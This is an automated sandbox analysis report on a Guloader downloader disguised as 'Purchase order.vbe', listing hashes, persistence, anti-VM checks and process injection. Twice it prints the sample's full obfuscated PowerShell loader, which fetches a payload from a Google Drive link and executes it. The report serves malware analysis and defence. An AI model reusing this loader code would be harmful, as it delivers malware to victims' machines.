Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
28-03-2023 17:46
Static task
static1
Behavioral task
behavioral1
Sample
Purchase order.vbe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Purchase order.vbe
Resource
win10v2004-20230220-en
General
-
Target
Purchase order.vbe
-
Size
13KB
-
MD5
496ff1fed502e29c071482cb102610c9
-
SHA1
6f5687c69e8ca873e26f1ee6b10d0ac8d1bbbb90
-
SHA256
19414e87fa7d0c6264b94810039b0465efd408d65efa70f62e9a8ec5ea8f222e
-
SHA512
829dfd71bd579be926e6cde629916868f63d18a2a9238c5362b0785b28fa21c31551fd3b78561d8fec2409d2acf2a96cb2beb242ad877f060311388d585cf2bb
-
SSDEEP
192:o9Al45haj3WuQYv5IdbcBoqEmeZx1zxqNklStddP93YBn/w7c0O23N/rgjKmrF:o9Z7Mvyl+NqZYNdtp30I/xmZ
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \Registry\User\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run NETSTAT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\6XJX5FYHT = "C:\\Program Files (x86)\\internet explorer\\ieinstal.exe" NETSTAT.EXE -
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
description ioc Process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe ieinstal.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Key created \Registry\User\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NETSTAT.EXE -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3680 ieinstal.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1404 powershell.exe 3680 ieinstal.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1404 set thread context of 3680 1404 powershell.exe 98 PID 3680 set thread context of 3104 3680 ieinstal.exe 51 PID 4696 set thread context of 3104 4696 NETSTAT.EXE 51 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 2072 3828 WerFault.exe 100 -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 4696 NETSTAT.EXE -
description ioc Process Key created \Registry\User\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 NETSTAT.EXE -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 3280 powershell.exe 3280 powershell.exe 1404 powershell.exe 1404 powershell.exe 3680 ieinstal.exe 3680 ieinstal.exe 3680 ieinstal.exe 3680 ieinstal.exe 3680 ieinstal.exe 3680 ieinstal.exe 3680 ieinstal.exe 3680 ieinstal.exe 4696 NETSTAT.EXE 4696 NETSTAT.EXE 4696 NETSTAT.EXE 4696 NETSTAT.EXE 4696 NETSTAT.EXE 4696 NETSTAT.EXE 4696 NETSTAT.EXE 4696 NETSTAT.EXE 4696 NETSTAT.EXE 4696 NETSTAT.EXE 4696 NETSTAT.EXE 4696 NETSTAT.EXE 4696 NETSTAT.EXE 4696 NETSTAT.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
pid Process 1404 powershell.exe 3680 ieinstal.exe 3680 ieinstal.exe 3680 ieinstal.exe 4696 NETSTAT.EXE 4696 NETSTAT.EXE 4696 NETSTAT.EXE 4696 NETSTAT.EXE -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 3280 powershell.exe Token: SeDebugPrivilege 1404 powershell.exe Token: SeDebugPrivilege 3680 ieinstal.exe Token: SeDebugPrivilege 4696 NETSTAT.EXE Token: SeShutdownPrivilege 3104 Explorer.EXE Token: SeCreatePagefilePrivilege 3104 Explorer.EXE -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 4972 wrote to memory of 3280 4972 WScript.exe 84 PID 4972 wrote to memory of 3280 4972 WScript.exe 84 PID 3280 wrote to memory of 1404 3280 powershell.exe 86 PID 3280 wrote to memory of 1404 3280 powershell.exe 86 PID 3280 wrote to memory of 1404 3280 powershell.exe 86 PID 1404 wrote to memory of 3680 1404 powershell.exe 98 PID 1404 wrote to memory of 3680 1404 powershell.exe 98 PID 1404 wrote to memory of 3680 1404 powershell.exe 98 PID 1404 wrote to memory of 3680 1404 powershell.exe 98 PID 3104 wrote to memory of 4696 3104 Explorer.EXE 99 PID 3104 wrote to memory of 4696 3104 Explorer.EXE 99 PID 3104 wrote to memory of 4696 3104 Explorer.EXE 99 PID 4696 wrote to memory of 3828 4696 NETSTAT.EXE 100 PID 4696 wrote to memory of 3828 4696 NETSTAT.EXE 100 PID 4696 wrote to memory of 3828 4696 NETSTAT.EXE 100
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Purchase order.vbe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Amfib9 ([String]$Trymovar){For($Lekti=1; $Lekti -lt $Trymovar.Length-1; $Lekti+=(1+1)){$Stol=$Stol+$Trymovar.Substring($Lekti, 1)};$Stol;}$Problemls=Amfib9 ' h tTtSpTs : / /Kd rPi v eB. gNo oCgCl eV. cBoEmU/SuTcO?NeBxAp oDr t =CdtoBwMnRl oPaId & iTdL=A1AdUGG5 wVo TAwKpak M vGjiY IspMj E pLF OlAFRL2Fi RAQ lRRK6TNaGKp ';$Stol01=Amfib9 'biGeMxR ';$vrge = Amfib9 ' \Bsvy sEw oSwH6R4E\ WFiFnSdPoBw sNPHoIwOeMr S hNeLl lW\BvL1T. 0C\Up oSw eRrPsUhfeBlNl .SeRxCe ';.($Stol01) (Amfib9 ' $MNLa gGa lAoUkuaS2M=s$Se n v : wSi n dOiRr ') ;.($Stol01) (Amfib9 'V$Sv r g e =f$jNSa gNaLl o kCaO2 + $PvPr gieT ') ;.($Stol01) (Amfib9 ' $BB acsRcKhI T=C (R( g wTm iA w i nS3 2L_Mp r oMc erscsS -GFR DP rCoDcSeOsTs ICd = $V{ P IGDU}T)S.QCEoKmBm a n d L i nAeW) I- slpIlFi tW [ c hOa r ] 3 4R ');.($Stol01) (Amfib9 'U$ M lNk eJv e =U $LBBa s c h [ $MB alsGcThP.ic oBuPnKt -F2 ]B ');.($Stol01) (Amfib9 'p$BF o rMlR=U(MT eKs t - PBaUtGhU $ v rSgNeL) t- AOnUd r( [TILn t P tIrM]U: : sSi zCe U-He q S8 ) ') ;if ($Forl) {.$vrge $Mlkeve;} else {;$Stol00=Amfib9 'HSBtSaYrHt - BsiFtDsOTTrVaAnFs f e r P-DS o uOr cBe $ PKrKoRbslAe m lDsB - Dpe sBt i n aKtUi o n $ N aUg aElEo k aS2S ';.($Stol01) (Amfib9 'L$TN aIg aBl o kMaL2d=E$Ee n v : a pypFdDa tAaI ') ;.($Stol01) (Amfib9 ' I m p oGrRtb-GM oLdguSlBeS HBNi tTsBTGrAaZnAs fMeTr ') ;$Nagaloka2=$Nagaloka2+'\spek.Non';while (-not $Pale) {.($Stol01) (Amfib9 ' $TPEaGlBe =S(CT eFs tU-VPWa tKhu $BN aRgBaJl oVkCaP2 )b ') ;.($Stol01) $Stol00;.($Stol01) (Amfib9 ' S tJa rPtC-BS l e e pK 5S ');}.($Stol01) (Amfib9 'M$BA mBfPiKbb =T GNe tC- CPo nAtAehn tT $ N aTgTaLlKoUkRaF2S ');.($Stol01) (Amfib9 'O$WBUa cBcPa e mGosb 1 4P2K O=C D[bSDy s tRe mI.RCEoAn v eAr tS] : :EFbr o m BFaGs e 6K4nS t rUiDnSg (I$NA mCfKiOb ) ');.($Stol01) (Amfib9 ' $ S t onl 2 c= [VSAy sEt e m .FTReDx tK.sEUn c oBd i n gF]V:S: AMS CIIDId. GSest SktCrMi nwg (V$ B atc cCaLe m oZbC1 4 2A) ');.($Stol01) (Amfib9 ' $Mu nRdIiKsosKoFnNaH= $OS t o lp2 .SsTuSbMsGt rIiJnAg ( 1B8 8O1 8O6S,E2D0U3 7 3U)O ');.($Stol01) $undissona;}"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Amfib9 ([String]$Trymovar){For($Lekti=1; $Lekti -lt $Trymovar.Length-1; $Lekti+=(1+1)){$Stol=$Stol+$Trymovar.Substring($Lekti, 1)};$Stol;}$Problemls=Amfib9 ' h tTtSpTs : / /Kd rPi v eB. gNo oCgCl eV. cBoEmU/SuTcO?NeBxAp oDr t =CdtoBwMnRl oPaId & iTdL=A1AdUGG5 wVo TAwKpak M vGjiY IspMj E pLF OlAFRL2Fi RAQ lRRK6TNaGKp ';$Stol01=Amfib9 'biGeMxR ';$vrge = Amfib9 ' \Bsvy sEw oSwH6R4E\ WFiFnSdPoBw sNPHoIwOeMr S hNeLl lW\BvL1T. 0C\Up oSw eRrPsUhfeBlNl .SeRxCe ';.($Stol01) (Amfib9 ' $MNLa gGa lAoUkuaS2M=s$Se n v : wSi n dOiRr ') ;.($Stol01) (Amfib9 'V$Sv r g e =f$jNSa gNaLl o kCaO2 + $PvPr gieT ') ;.($Stol01) (Amfib9 ' $BB acsRcKhI T=C (R( g wTm iA w i nS3 2L_Mp r oMc erscsS -GFR DP rCoDcSeOsTs ICd = $V{ P IGDU}T)S.QCEoKmBm a n d L i nAeW) I- slpIlFi tW [ c hOa r ] 3 4R ');.($Stol01) (Amfib9 'U$ M lNk eJv e =U $LBBa s c h [ $MB alsGcThP.ic oBuPnKt -F2 ]B ');.($Stol01) (Amfib9 'p$BF o rMlR=U(MT eKs t - PBaUtGhU $ v rSgNeL) t- AOnUd r( [TILn t P tIrM]U: : sSi zCe U-He q S8 ) ') ;if ($Forl) {.$vrge $Mlkeve;} else {;$Stol00=Amfib9 'HSBtSaYrHt - BsiFtDsOTTrVaAnFs f e r P-DS o uOr cBe $ PKrKoRbslAe m lDsB - Dpe sBt i n aKtUi o n $ N aUg aElEo k aS2S ';.($Stol01) (Amfib9 'L$TN aIg aBl o kMaL2d=E$Ee n v : a pypFdDa tAaI ') ;.($Stol01) (Amfib9 ' I m p oGrRtb-GM oLdguSlBeS HBNi tTsBTGrAaZnAs fMeTr ') ;$Nagaloka2=$Nagaloka2+'\spek.Non';while (-not $Pale) {.($Stol01) (Amfib9 ' $TPEaGlBe =S(CT eFs tU-VPWa tKhu $BN aRgBaJl oVkCaP2 )b ') ;.($Stol01) $Stol00;.($Stol01) (Amfib9 ' S tJa rPtC-BS l e e pK 5S ');}.($Stol01) (Amfib9 'M$BA mBfPiKbb =T GNe tC- CPo nAtAehn tT $ N aTgTaLlKoUkRaF2S ');.($Stol01) (Amfib9 'O$WBUa cBcPa e mGosb 1 4P2K O=C D[bSDy s tRe mI.RCEoAn v eAr tS] : :EFbr o m BFaGs e 6K4nS t rUiDnSg (I$NA mCfKiOb ) ');.($Stol01) (Amfib9 ' $ S t onl 2 c= [VSAy sEt e m .FTReDx tK.sEUn c oBd i n gF]V:S: AMS CIIDId. GSest SktCrMi nwg (V$ B atc cCaLe m oZbC1 4 2A) ');.($Stol01) (Amfib9 ' $Mu nRdIiKsosKoFnNaH= $OS t o lp2 .SsTuSbMsGt rIiJnAg ( 1B8 8O1 8O6S,E2D0U3 7 3U)O ');.($Stol01) $undissona;}"4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"5⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:3680
-
-
-
-
-
C:\Windows\SysWOW64\NETSTAT.EXE"C:\Windows\SysWOW64\NETSTAT.EXE"2⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Gathers network information
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4696 -
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:3828
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3828 -s 1204⤵
- Program crash
PID:2072
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 448 -p 3828 -ip 38281⤵PID:3640
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82